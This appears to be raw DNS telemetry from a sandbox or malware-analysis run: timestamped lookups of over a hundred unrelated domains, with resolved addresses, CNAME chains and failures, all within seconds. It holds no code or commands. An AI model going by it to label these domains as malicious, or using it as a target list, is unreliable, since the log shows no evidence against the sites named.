                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.890212059 CEST1.1.1.1192.168.2.30xed3fNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.069123983 CEST1.1.1.1192.168.2.30x167fNo error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.085167885 CEST1.1.1.1192.168.2.30x6880No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.176249027 CEST1.1.1.1192.168.2.30x1b8No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.226510048 CEST1.1.1.1192.168.2.30x5651No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.449527025 CEST1.1.1.1192.168.2.30xb2fbNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.525789022 CEST1.1.1.1192.168.2.30x17f4No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.656367064 CEST1.1.1.1192.168.2.30x3ebeNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.656367064 CEST1.1.1.1192.168.2.30x3ebeNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.740443945 CEST1.1.1.1192.168.2.30xae48Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.740652084 CEST1.1.1.1192.168.2.30x869fName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.867295980 CEST1.1.1.1192.168.2.30x45daNo error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.867295980 CEST1.1.1.1192.168.2.30x45daNo error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.006283045 CEST1.1.1.1192.168.2.30x6386No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.179296017 CEST1.1.1.1192.168.2.30xac9eNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.179296017 CEST1.1.1.1192.168.2.30xac9eNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.179296017 CEST1.1.1.1192.168.2.30xac9eNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.183728933 CEST1.1.1.1192.168.2.30x775fNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.445049047 CEST1.1.1.1192.168.2.30xdd19No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.445049047 CEST1.1.1.1192.168.2.30xdd19No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.445049047 CEST1.1.1.1192.168.2.30xdd19No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.445049047 CEST1.1.1.1192.168.2.30xdd19No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.449923992 CEST1.1.1.1192.168.2.30x6795No error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.720802069 CEST1.1.1.1192.168.2.30xf9d7No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.729043007 CEST1.1.1.1192.168.2.30x7d5bNo error (0)vivastay.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.729043007 CEST1.1.1.1192.168.2.30x7d5bNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.729043007 CEST1.1.1.1192.168.2.30x7d5bNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.729043007 CEST1.1.1.1192.168.2.30x7d5bNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.897407055 CEST1.1.1.1192.168.2.30x481bNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.903356075 CEST1.1.1.1192.168.2.30x465fNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.903356075 CEST1.1.1.1192.168.2.30x465fNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.903356075 CEST1.1.1.1192.168.2.30x465fNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.903356075 CEST1.1.1.1192.168.2.30x465fNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.924237013 CEST1.1.1.1192.168.2.30xb60bNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.936124086 CEST1.1.1.1192.168.2.30xb656No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.043596029 CEST1.1.1.1192.168.2.30xb27fNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.216613054 CEST1.1.1.1192.168.2.30xa4ecNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.604734898 CEST1.1.1.1192.168.2.30x1fc7Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.704493046 CEST1.1.1.1192.168.2.30x1fc7Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.132879019 CEST1.1.1.1192.168.2.30x79e3No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.154756069 CEST1.1.1.1192.168.2.30x8789No error (0)oh28ya.com35.75.241.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.154756069 CEST1.1.1.1192.168.2.30x8789No error (0)oh28ya.com54.178.105.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.324439049 CEST1.1.1.1192.168.2.30x944cNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.324439049 CEST1.1.1.1192.168.2.30x944cNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.424465895 CEST1.1.1.1192.168.2.30x2328Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.517538071 CEST1.1.1.1192.168.2.30xc5b2No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.544826031 CEST1.1.1.1192.168.2.30x4983No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.544826031 CEST1.1.1.1192.168.2.30x4983No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.598326921 CEST1.1.1.1192.168.2.30x9a67No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.618252993 CEST1.1.1.1192.168.2.30x59c3No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.618252993 CEST1.1.1.1192.168.2.30x59c3No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.618252993 CEST1.1.1.1192.168.2.30x59c3No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.618252993 CEST1.1.1.1192.168.2.30x59c3No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.776803017 CEST1.1.1.1192.168.2.30x9ba3Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.823844910 CEST1.1.1.1192.168.2.30xc226No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.823844910 CEST1.1.1.1192.168.2.30xc226No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.823844910 CEST1.1.1.1192.168.2.30xc226No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.885385036 CEST1.1.1.1192.168.2.30xd110Server failure (2)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.915213108 CEST1.1.1.1192.168.2.30x74a5No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.930161953 CEST1.1.1.1192.168.2.30x39bbNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.024533987 CEST1.1.1.1192.168.2.30x5475No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.739042997 CEST1.1.1.1192.168.2.30x874No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.739042997 CEST1.1.1.1192.168.2.30x874No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.790591002 CEST1.1.1.1192.168.2.30x5c5cNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.996588945 CEST1.1.1.1192.168.2.30x6b14Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.172219038 CEST1.1.1.1192.168.2.30x26feNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.172219038 CEST1.1.1.1192.168.2.30x26feNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.541975975 CEST1.1.1.1192.168.2.30xb5bbNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.542782068 CEST1.1.1.1192.168.2.30x7b64Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.557919025 CEST1.1.1.1192.168.2.30xee22Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.571113110 CEST1.1.1.1192.168.2.30x1fcaNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.763432026 CEST1.1.1.1192.168.2.30x3500No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.839394093 CEST1.1.1.1192.168.2.30x714fNo error (0)dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.839394093 CEST1.1.1.1192.168.2.30x714fNo error (0)dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.964428902 CEST1.1.1.1192.168.2.30x8260Name error (3)kayoaiba.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.661391020 CEST1.1.1.1192.168.2.30x806dNo error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.732355118 CEST1.1.1.1192.168.2.30x46b4Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.943176985 CEST1.1.1.1192.168.2.30x4e5aNo error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.152486086 CEST1.1.1.1192.168.2.30xf3c6No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.152486086 CEST1.1.1.1192.168.2.30xf3c6No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.406677008 CEST1.1.1.1192.168.2.30xc4b3No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.443450928 CEST1.1.1.1192.168.2.30xc15bNo error (0)www.koz1.net34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.443495989 CEST1.1.1.1192.168.2.30xc15bNo error (0)www.koz1.net34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.563676119 CEST1.1.1.1192.168.2.30x8df0No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.567935944 CEST1.1.1.1192.168.2.30x3951No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.687277079 CEST1.1.1.1192.168.2.30xed0fNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.703171015 CEST1.1.1.1192.168.2.30xa009No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.195065975 CEST1.1.1.1192.168.2.30xca4cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.195225954 CEST1.1.1.1192.168.2.30xca4cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.195236921 CEST1.1.1.1192.168.2.30xca4cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.462090969 CEST1.1.1.1192.168.2.30xbcc7No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.637200117 CEST1.1.1.1192.168.2.30x5e6eNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.039192915 CEST1.1.1.1192.168.2.30x2919No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.039227009 CEST1.1.1.1192.168.2.30x2919No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.085230112 CEST1.1.1.1192.168.2.30x2639No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.348925114 CEST1.1.1.1192.168.2.30xdc14Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.412306070 CEST1.1.1.1192.168.2.30xb7bdNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.417537928 CEST1.1.1.1192.168.2.30x7603No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.450306892 CEST1.1.1.1192.168.2.30x845cName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.947278976 CEST1.1.1.1192.168.2.30x8a4fNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.513156891 CEST1.1.1.1192.168.2.30xc6e0No error (0)htsmx.net34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.513179064 CEST1.1.1.1192.168.2.30xc6e0No error (0)htsmx.net34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.513190985 CEST1.1.1.1192.168.2.30xc6e0No error (0)htsmx.net34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.513205051 CEST1.1.1.1192.168.2.30xc6e0No error (0)htsmx.net34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.564522028 CEST1.1.1.1192.168.2.30x3c17No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:12.002966881 CEST1.1.1.1192.168.2.30x4639No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.134721994 CEST1.1.1.1192.168.2.30xd4bcServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.135328054 CEST1.1.1.1192.168.2.30xdc28Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.169456005 CEST1.1.1.1192.168.2.30x6d18No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.663651943 CEST1.1.1.1192.168.2.30x7724No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.693506956 CEST1.1.1.1192.168.2.30x60dfNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.693506956 CEST1.1.1.1192.168.2.30x60dfNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.693506956 CEST1.1.1.1192.168.2.30x60dfNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.693506956 CEST1.1.1.1192.168.2.30x60dfNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.694103956 CEST1.1.1.1192.168.2.30x75dbNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.790067911 CEST1.1.1.1192.168.2.30xe97dNo error (0)peminet.net77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.790067911 CEST1.1.1.1192.168.2.30xe97dNo error (0)77980.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.932565928 CEST1.1.1.1192.168.2.30xc7bcName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.146611929 CEST1.1.1.1192.168.2.30x67f2No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.161708117 CEST1.1.1.1192.168.2.30xafdbNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.161708117 CEST1.1.1.1192.168.2.30xafdbNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.161708117 CEST1.1.1.1192.168.2.30xafdbNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.288969040 CEST1.1.1.1192.168.2.30x73dbNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.288969040 CEST1.1.1.1192.168.2.30x73dbNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.550072908 CEST1.1.1.1192.168.2.30x116bNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.651042938 CEST1.1.1.1192.168.2.30x5d1fNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.651042938 CEST1.1.1.1192.168.2.30x5d1fNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.661593914 CEST1.1.1.1192.168.2.30xd6cdName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.695223093 CEST1.1.1.1192.168.2.30x6722No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.734947920 CEST1.1.1.1192.168.2.30xda6dNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.825954914 CEST1.1.1.1192.168.2.30x268cNo error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.011337042 CEST1.1.1.1192.168.2.30xa66eName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.046993971 CEST1.1.1.1192.168.2.30xb07bNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.047044039 CEST1.1.1.1192.168.2.30xb07bNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.127633095 CEST1.1.1.1192.168.2.30x8890No error (0)webways.com104.21.1.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.127633095 CEST1.1.1.1192.168.2.30x8890No error (0)webways.com172.67.128.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.169889927 CEST1.1.1.1192.168.2.30x19daNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.267275095 CEST1.1.1.1192.168.2.30xe0a1No error (0)dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.267275095 CEST1.1.1.1192.168.2.30xe0a1No error (0)dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.348087072 CEST1.1.1.1192.168.2.30xbbdNo error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.482175112 CEST1.1.1.1192.168.2.30x182fNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.504812002 CEST1.1.1.1192.168.2.30x5909No error (0)rkengg.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.504812002 CEST1.1.1.1192.168.2.30x5909No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.504812002 CEST1.1.1.1192.168.2.30x5909No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.504812002 CEST1.1.1.1192.168.2.30x5909No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.047488928 CEST1.1.1.1192.168.2.30x2040Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.158571005 CEST1.1.1.1192.168.2.30xd26eNo error (0)cubodown.com104.21.91.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.158571005 CEST1.1.1.1192.168.2.30xd26eNo error (0)cubodown.com172.67.212.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.171888113 CEST1.1.1.1192.168.2.30x6344No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.290060997 CEST1.1.1.1192.168.2.30x20c2No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.290060997 CEST1.1.1.1192.168.2.30x20c2No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.646090031 CEST1.1.1.1192.168.2.30x888dNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.92.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.110.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.94.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.106.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.97.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.84.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.137499094 CEST1.1.1.1192.168.2.30x9aa7No error (0)assideum.com52.219.94.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.142347097 CEST1.1.1.1192.168.2.30xc846No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.142347097 CEST1.1.1.1192.168.2.30xc846No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
